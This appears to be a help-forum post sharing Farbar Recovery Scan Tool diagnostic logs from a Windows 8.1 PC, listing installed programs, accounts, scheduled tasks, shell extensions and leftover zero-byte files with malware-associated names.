2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db
2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp
2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk
2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL
2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH
2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final
2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6
2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley
2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer
2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration
2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce
2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla
2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie
2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat
2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM
2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft
2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc
2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery
2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva
2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt
2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed
2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft
2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer
2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare
2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft
2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft
2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios
2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old
2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics
2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer

==================== Files in the root of some directories =======

2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg

Some zero byte size files/folders:
==========================
C:\Windows\mssecsvc.exe
C:\Windows\SysWOW64\taskshostservices.exe
C:\Windows\System32\taskshostservices.exe
C:\Windows\System32\Drivers\WinmonProcessMonitor.sys
C:\Windows\SysWOW64\Drivers\winmon.sys
C:\Windows\SysWOW64\Drivers\winmonfs.sys
C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-13 14:45

==================== End of FRST.txt ============================

Link to post
Share on other sites

NEW       ADDITION.TXT

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17.02.2019
Ran by #Strazzo.RoseGold## (18-02-2019 01:28:43)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
